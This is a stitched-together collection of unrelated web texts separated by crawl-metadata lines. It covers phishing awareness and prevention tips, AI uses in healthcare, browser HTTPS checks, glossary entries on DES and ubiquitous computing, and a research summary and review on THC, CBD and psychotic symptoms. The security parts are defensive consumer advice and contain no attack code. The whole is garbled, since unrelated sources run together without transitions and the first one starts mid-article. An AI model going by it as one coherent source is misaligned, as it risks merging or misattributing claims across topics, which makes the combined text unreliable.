Whaling, sometimes referred to as CEO fraud, is a type of attack that — much like in instances of spear phishing — focuses on a single target. However, whaling attacks usually aim to exploit high-ranking officials or other senior members in the organization to gain unauthorized access to sensitive financial data or computer systems.
Vishing and Smishing
The main thing that separates both Vishing and Smishing from other types of phishing attacks is that both are limited to a potential victim’s phone. Vishing refers to voice phishing. Think about scam calls impersonating a bank or offering lucrative investment opportunities. Smishing, on the other hand, is limited to text messages, but the aim of the attack, and the way it is designed is very similar to regular email phishing.
Today, phishing attacks are among the most common and dangerous types of cybercrime that businesses and individuals alike face on a daily basis.
A recent ESET study found a 7.3% increase in email-based phishing attacks between May and August 2021. Another study carried out by IBM discovered a 2% increase in phishing attacks between 2019 and 2020. The 2021 Verizon Data Breach Report noted that phishing attacks are involved in one way or another in about 36% of all breaches.
Over the years, phishing attacks grew not only in frequency but also in sophistication. While researchers at Tessian found that 76% of phishing emails did not contain malicious attachments, SonicWall’s 2021 Cyber Threat report discovered a steep increase in the numbers of malicious PDF and Microsoft Office files between 2018 and 2020. The increase likely corresponds to the fact that most people have a tendency to trust PDFs and MS Office documents. This trust is reflected in the fact that Microsoft is one of the most impersonated brands according to Check Point, which found that up to 43% of faux emails impersonated the tech giant. Other frequently impersonated organizations include DHL, Amazon, and LinkedIn.
Verizon’s report notes that in most instances of a phishing attack, the top compromised types of data are: credentials such as passwords, pin number, and usernames, and personal information such as full names and email address as well as medical information, which includes insurance claims and social security numbers. The report also highlights that the median loss of a business email compromise stands at $30,000.
Cisco’s 2021 cybersecurity threat trends reports took a look at the most targeted industries and found that the financial services industry is at the top of phishers’ target list. Other often targeted industries include retail, manufacturing, food and beverage, research and development, and tech.
What are common indicators of a phishing attempt?
A large part of phishing scams focus on exploiting fear. Often a phishing email will inform users that there has been some kind of an issue with their account. To solve the fake problem, the user is usually asked to click on a malicious link or download an attachment. As a result, unsurprisingly, most phishing emails use urgency in the subject line.
Attackers also focus on creating domains that can be very similar to a reliable brand’s domain. Bad actors will include branded logos to further fool unsuspecting users.
Catching a phisher
There are some typical red flags to look out for in most phishing emails.
The first thing to notice is whether the email uses your real name or not. If it addresses you as “dear customer” or “to whom it may concern,” you should be on the alert.
Phishing scammers will often send out huge batches of identical emails without targeting specific individuals. If a legitimate company reaches out to you, they'll almost always know your name.
The language used in phishing emails can also be a giveaway. Keep an eye out for odd turns of phrase, poor grammar, or obvious misspellings. A genuine email from your bank will not contain these kinds of errors.
Of course, the email sender’s address is also important. Check to make sure it looks legitimate. If there’s any doubt, check it against other emails you've received from the organization.
Lastly, be wary of urgency in the email. If someone demands money or presses you to click a link “before it’s too late,” that’s not a good sign. Criminals will often attempt to make the victim panic or rush to action without stopping to look closer at the email itself.
What happens if you click on a phishing link or download a malicious attachment?
If you happen to fall victim to a phishing scam, one of the things you can be almost sure of is that the attackers will let other scammers know that their attack on you was a success. In turn, you will most likely experience even more phishing attacks coming your way.
Falling victim to a phishing scam could also result in the loss of personal data such as your name, address, phone number, and other personally identifiable information, which in turn could lead to ever more issues such as identity theft.
A successful phishing attack on a business could result in a full-on data breach, which today could very well mean the end of the company.
How to prevent phishing
Slow down and think.
This is essential. Never hurry through an email and follow its instructions. Is someone urging you to immediately follow a link to collect prize money? Are you being told to go to a website to change your passwords as soon as possible? Slow down and make sure that the email is genuine first.
Don’t follow links directly.
Most phishing emails will ask you to click on a link. That could open the door to malware, viruses, and ransomware. Avoid this problem altogether by never following email links, unless they’re from a trusted, verified sender.
If you’re in doubt, open a new tab and navigate to the real company’s page. To be certain, you can even email or call the organization directly and ask if they contacted you recently.
Don’t trust your spam filters for everything.
Your email will filter spam and junk mail into a separate box to be deleted later, but it doesn’t always catch everything. Don’t assume that something is automatically safe just because it hasn’t been caught by the filters. Errors like this happen all the time, so be careful.
Ask yourself whether you’ve had previous contact with the sender.
If a bank you’re not with emails you asking you to log in to your account via its email message, that’s a sure sign you’re being targeted. Most phishing emails are sent in the hopes that you’ll click on the link without thinking. Ask yourself if you actually have any account or relationship with the company the sender claims to represent. If the answer's no, ignore or delete the message.
Phishing emails can be highly effective, and they’re one of the oldest internet scams in the book. The best defense against them is vigilance and some common sense.
Subscribe to NordPass news
Get the latest news and tips from NordPass straight to your inbox. | <urn:uuid:ac2bd60c-5a93-4d42-a149-ea6056714424> | CC-MAIN-2022-40 | https://nordpass.com/es/blog/what-is-phishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00165.warc.gz | en | 0.952519 | 2,213 | 2.90625 | 3 |
In retail, the use of AI and Machine Learning is about driving sales and ROI. In education, it’s about student engagement and learning. In hospitality, it’s about guest services. In healthcare, it’s about saving lives. Medical errors are the third-leading cause of death after heart disease and cancer. By leveraging AI and Machine Learning we can minimize errors, save lives, and conserve resources at the same time.
Virtual nursing assistants can reduce unnecessary patient hospital visits and lower the burden on the medical staff. For routine monitoring of levels, dosages, and checkups, the use of AI can monitor patients after they leave the hospital and lower re-admittance rates.
Back in 2017, Apple and Stanford unveiled a heart study program using the Apple Watch’s heart rate sensor to collect data on irregular heart rhythms and notify users who may be experiencing atrial fibrillation (AFib). AFib, the leading cause of stroke, is responsible for approximately 130,000 deaths and 750,000 hospitalizations in the US every year. Many people don’t experience symptoms, so AFib diagnosis is often missed. As we live in a more connected world, by putting Machine Learning to work on mass amounts of anonymized medical information, doctors and researchers can learn about new diseases, new trends, and build new medications.
Using AI to diagnose patients is undoubtedly in its early stages, but there have been some interesting use cases. A Stanford University study used an AI project to detect skin cancer against dermatologists, and it performed at the same level as humans. As more information is collected, it’s likely that AI diagnosis will become even more accurate over time.
Using AI and Machine Learning is going to allow us to learn more and more about how diseases respond to medicine, how diseases form, and what we can do to prevent. Plain and simple: lives will be saved in the future because of AI and Machine Learning in healthcare. | <urn:uuid:f585db49-4788-4571-8cf0-7d1f463fa05e> | CC-MAIN-2022-40 | https://www.extremenetworks.com/extreme-networks-blog/how-ai-and-machine-learning-impact-cloud-managed-healthcare-networking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00165.warc.gz | en | 0.9316 | 402 | 3.28125 | 3 |
Using the Internet is a dangerous place full of areas that can get you into trouble. Time and time again I see people who are not aware of these dangers get themselves, their homes and their places of work in trouble. All it takes is a bad link to a website that looks legit to ruin your day. Identity theft, malware, viruses or worse can happen to you without your knowledge until the damage is done unless you are careful. I wanted to write a series of posts that covers the basics of Internet use. Think of it Internet Safety 101. The more you know the more aware you can be when you come across something that appears to be fishy or out-of-place. More importantly I hope that these series of posts are simple enough in explanation to be sent by you out to those you know that are not as savvy in the Internet lingo. Those are the ones that will get bit by a mistake.
This blog entry is about the Internet browsers. The tool to access all the webpages, email, games, social sites and videos that you consume. The screenshots in this post will be from Internet Explorer 10 but all the browsers will function similarly and allow you to view the same information. There are many software tools you can use that allow you to browse the Internet. I will direct the average user to the top 4, my top 4 preferred browsers. They are:
When you browse to a webpage it is important to know that there are two basic security modes of a webpage. HTTP and HTTPS. HTTP is an un-encrypted method that most websites use for general display. HTTPS is the encrypted, secure method. In the browser here’s how you can tell the difference and I will explain why this is critical to know this information.
For no particular reason I will use Bank of America’s website as the example. In the address bar, the text box at the top where the web address is, you will see http:// or https:// before the www.site.com address. This is the first piece of information to ensure the security level of a website. Any website that has your financial, personal, business, or any other protected data should ALWAYS be HTTPS. NEVER login to a website where the login page is HTTP. The reason is that if there is a hacker watching that website your username and password can be seen in clear text. Wide open for anyone to grab. HTTPS encrypts or scrambles the text so only the website can understand and read it.
The second step to validate is to look at the information of the HTTPS security. There is a component called a certificate that site on those servers. The certificate is what handles the encryption. Clicking on the green bar the certificate information pops up. The browsers today will prove enough links and information to help you determine if you can trust a website or not.
This box will tell you that the certificate is trusted, who issued it and who it was issued to. If you click on View certificates you will get more information to give credibility to the security. Most of the times you don’t need to check this, but it’s there if you want to. Especially on new websites you are not familiar with.
NOTE – Just because the website looks like your bank, always check the address bar to make sure. Anyone can make a webpage look like your bank’s. Unless you slow down and do these simple verification you may be freely giving your username and password to a phishing website. This is how simple it is to get into trouble. The majority of identity thefts are not accomplished through true front door hacking, they are socially engineered by tricking users into putting their security information into a site that looks legit but is not.
HTTPS should always be used for any bank. If you don’t see HTTPS, get off the page immediately. Even Facebook switched over to HTTPS as the default for their site.
Your Internet browser will tell you everything you need to know about a site you are visiting but it won’t tell you if it’s where you intended to be or not. Sometime the built-in blockers will tell you if the site is dangerous but never rely on that. You are responsible for know where you are going and where you are putting your critical keys.
That’s basic Internet security overview 101. How to trust a site or not. The best practice is if you are unsure, lean toward safety and don’t use it. In later posts I will detail out on the practice of using multiple email addresses and userids for kinds of websites you use. No matter where you go the browser is the first line of defense of your protection. Never assume.
The last point I want to make and this goes for any type of software is to stay current with the updates. All of the browsers makers release updates to the software regularly to address any bugs and to always improve the security strength of their products. Just because you use a browser today, hackers are always trying to find holes to exploit to get at your data. The more up to date you are on the updates the better protected you maintain.
Share this with your less than educated family members, get them to read and learn about the Internet beyond Candy Crush on Facebook. One day they may click on something and unknowingly hand over their username and password to their bank and before they realize it their accounts are drained to zero.
Like the old 80s shows and PSAs would say, knowledge is power, the more you know, knowing is half the battle and so on.
End of Line.
Binary Blogger has spent 20 years in the Information Security space currently providing security solutions and evangelism to clients. From early web application programming, system administration, senior management to enterprise consulting I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day. | <urn:uuid:a39f7e61-8896-4d4e-b6c5-54a9bb4c5c0a> | CC-MAIN-2022-40 | https://binaryblogger.com/2014/03/03/safer-internet-use-browsers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.943682 | 1,200 | 2.796875 | 3 |
Data Encryption Standard (DES)
Data Encryption Standard (DES) is a symmetric block cipher that was once the US Government’s gold standard in methods it and others used to encrypt sensitive data. DES was succeeded by the Advanced Encryption Standard (AES) when, in the face of adversaries’ more potent brute-force capability, DES was deprecated.
IBM developed DES in the 1970s based on Horst Feistel’s earlier design. It was submitted to the US Government’s precursor to the National Institute of Standards and Technology (NIST) in response to calls for a data-protection algorithm. In 1976 the NIST precursor consulted with the National Security Agency (NSA) and adopted a modified version that became DES.
The five-year competitive process that NIST used to create AES (1997-2000) was far more collaborative, transparent, and open than the one used for DES. The latter process was rather closed and this harmed its reputation, as did suspicions that the NSA sought a backdoor to DES.
DES’s viability suffered as a result of a modification to it, which increased difficulty against differential cryptanalysis but diminished its resistance to brute force attacks. On the whole, DES’s short key length of 56 bits made it short-lived in the face of rapid developments in computing, including for cracking encryption.
A symmetric cipher is one that uses the same key for encryption and decryption. Aside from DES and AES, notable examples of symmetric ciphers include Blowfish and International Data Encryption Algorithm (IDEA). | <urn:uuid:108bbbe2-e257-4774-9a4a-8964f2406e70> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/data-encryption-standard-des | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.95155 | 326 | 3.71875 | 4 |
Ubiquitous Computing is a term associated with the Internet of Things (IoT) and refers to the potential for connected devices and their benefits to become commonplace.
Also called ambient computing or pervasive computing, ubiquitous computing can be described as the saturation of work, living, and transportation spaces with devices that intercommunicate. These embedded systems would make these settings and transportation methods considerably more enjoyable and convenient since through contextual data aggregation and application, seamless, intuitive access points, and fluid payment systems.
A prime example of a ubiquitous computing experience would be an autonomous vehicle that recognizes its authorized passenger through smartphone proximity, docks and charges itself when needed, and handles toll, emergency response, and fast-food payments itself by communicating with infrastructure.
“The dystopian sci-fi film ‘Minority Report’ depicted an unhappy future of ubiquitous computing abuses. The saturation of devices, passive biometric scans, and tracing of people according to their various forms of identification was overwhelming by our standards as we are just beginning to usher in the IoT.” | <urn:uuid:8a43a07d-7f15-4e9c-bdb1-6aab9aaebe1c> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/ubiquitous-computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.943168 | 219 | 3.421875 | 3 |
Researchers from King’s College London have investigated the impact of short-term use of two important psychoactive constituents in cannabis on healthy volunteers: delta-9-tetrahydrocannabinol (THC) and cannabidiol (CBD).
By analysing the results from 15 studies involving a total of 331 participants, the research showed that a single dose of THC could induce psychiatric symptoms in people with no history of psychotic or other major psychiatry disorders.
Published in Lancet Psychiatry, the research considered the effects of THC and CBD on different types of psychiatric symptoms.
The study, which only included research on healthy volunteers, showed that the largest effect of THC compared to a placebo was recorded for general symptoms which included depression and anxiety (effect size of 1.01).
For positive symptoms, such as delusions and hallucinations which are often experienced in schizophrenia, the acute administration of THC showed an effect size of 0.91 across the studies, whilst for negative symptoms such as blunted affect and lack of motivation, there was an effect size of 0.78.
Statistically the extent of all three of these effect sizes is described as large, indicating that a single dose of THC induces all three types of psychiatric symptom to a level considered to be clinically important.
Cannabis is one of the most widely used psychoactive substances worldwide, with 6-7% of the population in Europe using it every year, over 15% in the USA and around 188 million people globally.
The drug has been legalised in 11 US states, Canada and Uruguay and policymakers elsewhere are deliberating whether to allow the medicinal use of cannabis products.
Four of the 15 studies examined the effects of CBD on psychiatric symptoms induced by THC in healthy volunteers. Analysis of these studies showed that CBD did not induce any of the three types of psychiatric symptoms. There was no consistent evidence across the four studies that CBD moderates the effects of THC in healthy volunteers.
The doses of THC in the meta-analysis ranged from 1.25mg to 10mg, leading to peak THC blood levels of 4.56 to 5.1 ng/ml when orally administered and 110-397 ng/ml when injected or inhaled.
These blood levels are comparable to those seen shortly after smoking a single typical cannabis joint containing 16-34mg of THC.
Senior author, Professor Oliver Howes from Institute of Psychiatry, Psychology & Neuroscience (IoPPN), King’s College London said: ‘By analysing the results of studies that only consider effects of THC on people who have not experienced mental health problems our research provides evidence that after taking THC-containing cannabis just once it is possible to experience psychiatric symptoms, some of which are akin to those seen in schizophrenia.
What isn’t clear from our research is how long-standing or distressing these symptoms could be, which will be important to assess when considering any long-term impact on mental health.
‘Our study has some implications not only in terms of legalising cannabis but also in terms of the use of medical cannabis products which may contain THC.
With the THC:CBD ratio increasing in street cannabis it is important for further research to investigate the effect of different ratios on psychiatric symptoms and mental health and, for those thinking about the use of medical cannabis, to discuss potential risk with medical professionals.’
Researchers considered a range of important variables that could moderate the effects of these two cannabis constituents. Their analysis showed that intravenous administration of THC was associated with greater positive symptoms than inhaled THC, and that positive symptoms induced by THC were lower in tobacco smokers compared to those who did not smoke tobacco.
Researchers highlighted that the association between tobacco use and effect of THC on positive symptoms should not be interpreted as a recommendation to use tobacco to counter the effects of THC.
Tobacco smoking is associated with lower levels of the receptor in the brain to which THC binds called the cannabinoid 1 receptor (CB1R), which could mean smokers are less sensitive to effects of THC.
An increase in age was associated with more negative symptoms induced by THC. Sex, dose, current cannabis use, frequency of cannabis use and type of THC had no moderating impact on the effects.
Contributing author, Dr Faith Borgan from the IoPPN said: ‘THC acts on the brain by binding to a protein called the cannabinoid 1 receptor (CB1R). Our finding that schizophrenia-like symptoms can be induced by THC adds to existing evidence that there is a potential role of the CB1R in schizophrenia.
This receptor is altered in patients with schizophrenia who do not use cannabis, and greater alterations of the receptors are linked to more severe positive, negative, and general symptoms in patients.
An increase in age was associated with more negative symptoms induced by THC. Sex, dose, current cannabis use, frequency of cannabis use and type of THC had no moderating impact on the effects.
‘CBD did not consistently block the adverse effects of THC. More work is needed to identify which doses of CBD should be used since only a low proportion of the compound can be absorbed, owing to its low levels of bioavailability.
There is also a need for future work to identify the mechanisms underlying the effects of CBD, and the effects of cannabis with varying THC:CBD ratios.’
The authors highlight several limitations to their study. Their finding that psychotic symptoms were not moderated by level of dose or by prior cannabis use contrasts with results from several studies and may reflect limited power in the analysis.
They suggest that further work is needed to clarify the effects, particularly at the level of individual symptoms.
The authors identified potential publication bias, where significant findings are more likely to be published than lower effect sizes. However, they found that the better the quality of the study, the greater the effect size, suggesting that their results – which also included lower quality studies – may in fact underestimate the size of the effect of THC on inducing symptoms.
Cannabis use is common and becoming more so. There were an estimated 192.2 million users worldwide between the ages of 15–64 in 2016. This number of worldwide users represents a 16% increase compared to 2006 .
Legalization of cannabis for medical use has contributed to this increase . In the United States, states that have passed medical cannabis laws have seen greater increases in illicit cannabis use and in cannabis use disorders compared to states that have not passed medical cannabis laws .
As use has increased, population-level perceptions as to the harmfulness of cannabis have decreased . Tetrahydrocannabinol (THC) is of course usually considered the active ingredient but cannabidiol (CBD), several other cannabinoids, and terpenoids play a role in the pharmacology of cannabis .
Cannabis use has been associated with psychotic symptoms and disorders including schizophrenia across many populations and in many different study designs [6,7,8,9]. The nature of this association is complex and can be rife with confounders.
This is especially so when looking at long-term psychotic outcomes related to cannabis use. There has been debate in the literature as to whether cannabis use is a causative factor for schizophrenia or whether the association between the two rather represents some shared vulnerability to both [8,10].
Another putative reason for the association has been that cannabis use represents an attempt by people with emerging psychosis to self-medicate their symptoms though recently that explanation has been falling out of favor as a primary explanation [7,9].
While this review focuses on cannabis proper we should note before moving on that synthetic cannabinoid use is a growing clinical concern due to the significant prevalence and potential for severe health effects beyond what is seen with cannabis [11,12].
A 2013 survey of 50,000 US high school students reported 6.4% of students with past-year synthetic cannabinoid use compared to 25.8% of students with past-year cannabis use . The US Army Substance Abuse Program in 2012 conducted a study where they randomly collected 10,000 urine samples and tested for synthetic cannabinoids.
That study reported a 2.5% positivity rate . Synthetic cannabinoids are not tested for on routine clinical urine drug screens and so will often go undetected even in substance abuse treatment settings .
Part of the difficulty here is that there is a large and increasing number of distinct synthetic cannabinoids with diverse chemical structures being constantly synthesized making it difficult to develop assays for everyday clinical use.
Compare this with cannabis which is the easiest substance of abuse to “catch” on urine drug screens . This difficulty of detection along with governmental difficulty in efficiently identifying and legally controlling each new synthetic cannabinoid draws many people to them .
Synthetic cannabinoids are, sometimes dramatically so, associated with psychosis . In regular cannabis use there is the low-affinity partial agonist THC acting on the CB1 receptor leading to many of the effects of cannabis use. In contrast, synthetic cannabinoids are full agonists with high affinity at the CB1 receptor .
Given this, it is not surprising that any deleterious effects from the former could be seen with greater severity and frequency with the latter. Indeed, much has been written about the harmful effects of synthetic cannabinoids including risk of psychosis [11,12,15,17,18,19,20,21].
The term psychosis in clinical settings refers to a plethora of abnormalities. Psychotic symptoms occur over a spectrum from acute to chronic and from mild to severe. Manifestations of psychosis are commonly broken down into “positive” and “negative” symptoms.
Positive symptoms include delusions, hallucinations, disorganized thinking/speech/behavior, and disorganized or abnormal motor behavior. Negative symptoms include diminished emotional expression, avolition, alogia, anhedonia, and asociality (pp 87–89).
Positive symptoms are abnormal by their presence whereas negative symptoms represent abnormalities via absence of normal behaviors. Most of the reported associations between cannabis and psychosis, particularly for acute effects of cannabis use, focus on positive symptoms. However, there is some evidence of acute effects resembling negative symptoms as well [23,24].
Psychosis is merely a symptom whereas Schizophrenia is a chronic, lifelong illness, characterized by the presence of severe psychotic symptoms [22,25] (pp. 99–105). In addition to the chronicity required for a Schizophrenia diagnosis the concept of “first rank” psychotic symptoms has historically been used to help differentiate schizophrenia from other psychotic conditions .
First rank psychotic symptoms are relatively severe and are somewhat specific for Schizophrenia [27,28]. First rank psychotic symptoms include auditory hallucinations, delusional perceptions, experiences of thought interference, and passivity experiences [26,27]. Schizophrenia can lead to a devastating impairment in quality of life.
Schizophrenia was responsible for 13.6 million disability-adjusted life years worldwide in 2010 . Because schizophrenia confers extremely high morbidity and mortality it is understandable that so much attention has been paid to asking whether cannabis use increases one’s risk for developing it .
Cannabis is associated with a range of psychotic symptoms of widely variable severity. Cannabis is also associated with psychotic symptoms of widely variable timeframes. Cannabis-associated psychosis can be seen on the order of minutes, hours, days, or weeks in addition to the months and years timeframe seen in a schizophrenia diagnosis [6,31,32].
A holistic understanding of the link between cannabis and psychosis requires us to look at more than just schizophrenia. For the current review we will describe the association between cannabis and psychosis as it plays out in the context of three Diagnostic and Statistical Manual of Mental Disorders, fifth edition (DSM-5) diagnoses: Cannabis Intoxication, Cannabis-Induced Psychotic Disorder (CIPD), and Schizophrenia .
It is useful to use this lens because the DSM-5 criteria are very widely used and accepted. This gives us firmer footing to describe different “kinds” of cannabis-associated psychotic experiences than we would have otherwise.
Delineating the plethora of cannabis/psychosis associations in the literature into these categories is merely meant as a useful way to conceptualize the associations and is not meant to strictly indicate the original works referenced in this review themselves were working with DSM-5 criteria.
No single diagnostic framework is used consistently in the cannabis/psychosis literature with DSM-III, DSM-IV, DSM-5, ICD-8, ICD-9, and ICD-10 diagnoses all being used at different times as well as the use of a variety of clinical psychosis rating scales.
This is a diagnosis made when there is recent cannabis use, significant behavioral or psychological changes that developed during or shortly after cannabis use, and physical stigmata indicating the intoxication such as conjunctival injection or dry mouth (p. 516). With respect to timing cannabis intoxication occurs within minutes for inhalational use but onset can take hours when cannabis is ingested.
The symptoms typically last 3–4 hours but depending on dose and tolerance can persist up to 24 hours . This is basically the standard cannabis “high” documented in the DSM-5 as a mental disorder in situations where it causes neuropsychiatric symptoms that are problematic.
Psychotic symptoms are not necessary for a cannabis intoxication diagnosis but can be part of the disorder with the caveat that insight must remain intact and the psychotic symptoms must not be sufficiently severe or persistent enough to warrant clinical attention for their own sake.
If the symptoms are severe or persistent enough to warrant clinical attention for their own sake, then that would move us to a CIPD diagnosis. CIPD is discussed in the following section.
Most individuals meeting criteria for Cannabis Intoxication will not present for acute medical care, so looking at psychotic symptoms within this disorder gives us a sense of what psychotic symptoms can be associated with cannabis use in non-clinical populations.
We can also note that the vast majority of worldwide cannabis users have at some point met criteria for a Cannabis Intoxication diagnosis (becoming intoxicated is to some degree the goal of any cannabis use) so the psychotic symptoms experienced therein have potential to effect a huge number of persons worldwide.
Having described what Cannabis Intoxication is per the DMS-V we can look at the evidence associating cannabis and psychosis as might be seen within the parameters of this disorder.
A 2004 double-blind placebo-controlled experimental study by D’Souza et al that documented psychotic symptoms in healthy subjects after intravenous THC administration provides us with a straightforward and useful example .
By administering the Positive and Negative Syndrome Scale (PANSS) at different timepoints before and after intravenous THC administration, the transient or “intoxication” effects of THC with respect to psychotic symptoms were able to be followed. The PANSS is commonly used in research to monitor symptoms of psychosis .
The PANSS was administered 60 minutes prior to injection, 10 minutes after, 80 minutes after, and 200 minutes after. It was found that a modest mean increase in positive symptoms occurred and peaked 10 minutes after injection and returned to baseline by 200 minutes after injection.
A transient increase in mean negative symptoms also was seen after injection and again symptoms returned to baseline by 200 minutes. Due to the study design using intravenous THC as opposed to inhaled or ingested THC the results seen here show quicker on/off effects than what would be experienced in the population at large where inhalation or ingestion are the common administration routes.
The transient increases seen in this study in both positive and negative symptoms measured via PANSS peaked at approximate scores of 10. Putting these results in context the possible PANSS scores for either positive or negative symptom subscales are 7 to 49 and PANSS averages for schizophrenic persons have been reported at 18.2 for positive symptoms and 21.01 for negative symptoms .
So, we see that while increases in psychotic symptoms were seen in this study using healthy subjects the magnitude of symptoms was quite small and transient as mentioned above. Also, it is notable that a dose–response relationship was seen in this study with more psychotic symptoms occurring with 5 mg THC injection compared to 2.5 mg THC injection.
This finding of an acute transient increase in psychotic symptoms after intravenous THC administration in healthy subjects was replicated by Morrison et al. in 2009 . In human laboratory studies, concerning healthy individuals being administered THC at high doses, it has been approximated that 35–50% will experience psychotic symptoms .
The largest pool of evidence describing acute transient psychotic symptoms associated with cannabis use can be found in studies documenting general population cannabis users self-reported psychotic experiences during acute use.
This data also gives us some sense of the proportion of cannabis users that experience psychotic effects acutely when using the drug in naturalistic settings. A 2003 review by Green et al. examined 12 studies that surveyed users’ subjective effects when using cannabis .
Three of the studies used open-ended questions to elicit subjective effects while nine studies used closed-ended questioning (checklists or questionnaires). All studies used had a sample size over 30. The open-ended studies found 2–14% of subjects reported hallucinations while 6–15% of subjects reported paranoia.
The closed-ended questioning studies allowed for results to be combined when the surveys asked similar or identical questions about subjective effects of cannabis. Of subjects in closed-ended questioning studies, 19.8% reported hallucinations/visions (N = 3082), while 51.4% reported paranoia (N = 2708).
It is interesting to note that close-ended questioning elicited more psychotic symptoms than open-ended questioning. Cannabis users were seen throughout these studies to endorse mostly beneficial effects when describing effects spontaneously and to endorse proportionally more harmful/bothersome effects when made to consider these via checklists and questionnaires.
This is congruent with the cognitive biases typically associated with substance use disorders. It is interesting to see this even in this non-clinical population .
There is also evidence from a study by Sami et al. that former cannabis users were more likely to report having had psychotic experiences with cannabis than current cannabis users who were more likely to report pleasurable experiences .
Current users who indicated a future intention to quit were more likely to have had psychotic experiences with cannabis than current users who indicated no desire to quit. These findings (along with the differences Green et al reported with open vs closed questions) suggest a potential “in” for insight-driven interventions for helping people quit cannabis such as motivational interviewing.
As it is clear many users do not report psychotic effects from acute cannabis use it becomes important to ask what kind of person is at risk for these bothersome acute effects. Mason et al. looked at acute psychotic symptoms associated with cannabis use and stratified their cannabis users based on high or low pre-intoxication scores on the Schizotypal Personality Questionnaire (SPQ) .
SPQ was used as a proxy for baseline psychotic symptoms and can be taken to indicate risk or susceptibility to psychosis . This study found greater acute transient effects on psychotic symptoms in individuals with higher SPQ scores at baseline. Acute effects were taken as the difference between Psychotomimetic States Inventory (PSI) scores 10–15 minutes after use and PSI scores 3–5 days later after at least 24 hours of cannabis abstinence.
This result provides evidence that certain individuals, especially those experiencing some mild psychotic symptoms at baseline, are more prone to acute transient psychotic symptoms associated with cannabis use than others.
Having described some of the evidence for an acute association between cannabis and psychosis, as could be seen in a Cannabis Intoxication diagnosis, we will move on to describe Cannabis Intoxication’s more severe and persistent progeny, CIPD.
Cannabis-Induced Psychotic Disorder (CIPD)
Substance-Induced psychotic disorders are recognized by the DSM-5 and are placed in the category of Schizophrenia Spectrum and Other Psychotic Disorders. Substance-Induced psychotic disorders related to practically all substances of abuse can be described using this diagnosis (pp 110–115).
A diagnosis of Cannabis-Induced Psychotic Disorder is given when one or both of hallucinations and delusions are present, the hallucinations and/or delusions developed during or soon after cannabis intoxication, the disturbance does not occur exclusively during the course of a delirium, and the disturbance causes clinically significant distress or impairment in social, occupational, or other important areas of functioning.
Other criteria for the disorder are that cannabis should be thought to be capable of producing the disturbance seen and that the disturbance should not be able to be better explained by an independent psychotic disorder that is not cannabis-induced (such as pre-existing schizophrenia). The DSM-5 suggests that if symptoms last longer than one month a diagnosis other than CIPD should be considered (p. 110).
Substance-induced psychotic disorders generally can occur in the context of recent intoxication or withdrawal from a substance (for example with alcohol) but in the case of cannabis only psychotic symptoms occurring in the context of recent intoxication are thought to appropriately lead to a CIPD diagnosis (p. 114).
Several things differentiate CIPD from Cannabis Intoxication. First and foremost is that in CIPD the hallucinations and/or delusions are the focus of the clinical presentation and are severe enough to warrant clinical attention/treatment as opposed to the psychotic symptoms that can be seen in Cannabis Intoxication which are more mild and self-limited and are not even required to make that diagnosis.
A further distinction is that the hallucinations in CIPD are experienced without insight whereas in Cannabis Intoxication the hallucinations when present are experienced with insight intact and the DSM-5 linguistically downgrades these in places from frank hallucinations to “perceptual disturbances.” In addition to greater intensity/severity of symptoms CIPD can also have a much longer duration than Cannabis Intoxication.
Cannabis Intoxication will necessarily resolve within 24 hours whereas CIPD can last for days and even weeks after cannabis exposure . However, criteria for CIPD could also be met in a presentation only lasting on the order of hours if the symptoms are severe.
The concept of a cannabis psychosis apart from simple intoxication has been recognized for literally hundreds of years—take the following example from 1779 describing a preparation of cannabis known as “Bangue”.
“Bangue is an intoxicating herb; in the use of which it is hard to say what pleasure can be found, it being very disagreeable to the taste and violent in its operation which produces a temporary madness, that in some, when designedly taken for that purpose, ends in running, what they call a muck, furiously killing every one they meet without distinction till themselves are knocked on the head like mad dogs (p. 21).”
Another historical example of the recognition of CIPD consistent cannabis/psychosis association comes from French psychiatrist Dr Jacques-Joseph Moreau in 1845, describing the effects of hashish:
“acute psychotic reactions, generally lasting but a few hours, but occasionally as long as a week…illusions, hallucinations, delusions, depersonalization, confusion, restlessness and excitement .”
A 2016 study using emergency department data from Vallersnes et al gives us a registry data example of a cannabis/psychosis association consistent with CIPD . This study searched a European database (Euro-DEN) that tracks Emergency Department (ED) visits for acute recreational drug toxicity.
Over a one-year period across 16 centers they found 90 ED presentations where psychosis was a presenting complaint and acute cannabis use had occurred. In 31 of those presentations cannabis was the sole substance reported.
This study excluded overdoses/self-harm presentations and allowed for substances documented to have been used acutely to be patient and observer reported. This second distinction is particularly important when trying to assess association between acute cannabis use and CIPD-consistent psychosis since lab-testing for cannabis can be positive long after acute ingestion.
Unfortunately, most of the literature with respect to documented cases consistent with CIPD diagnoses is limited to case reports and case series and many of the oft-cited examples are from decades ago.
In general we can say that these case reports and series describe acute cannabis use, psychotic symptoms severe enough to bring the individual to medical attention, symptoms occurring immediately after cannabis use, and return to baseline several hours to weeks after ingestion [44,45,46,47,48,49,50,51].
The one large study by number of subjects (N = 36,000) looked at American soldiers in Germany and documented some cases of “toxic psychosis” and “schizophrenic reactions” but did not control for use of other drugs and alcohol . One of these studies had follow-up enough to document that the individuals who later relapsed with respect to cannabis use uniformly had recurrence of psychotic symptoms .
The return to baseline functioning as documented in these case reports is crucial in order to maintain the concept of CIPD. The difficulty in confidently diagnosing CIPD has been widely noted, as confirming absence of prior prodromal or psychotic symptoms and then also confirming return to baseline is quite difficult [31,52,53].
The “fuzziness” of the diagnosis and the dissimilar situations where it applies leads to confusion. CIPD criteria are met both in cases of extreme intoxication where psychotic symptoms overwhelm the clinical picture but may be very short lived, and also in situations that—apart from knowledge of recent cannabis exposure—could appear identical to a first break psychosis as is seen in schizophrenia (i.e. requiring extended hospitalization and antipsychotic medication).
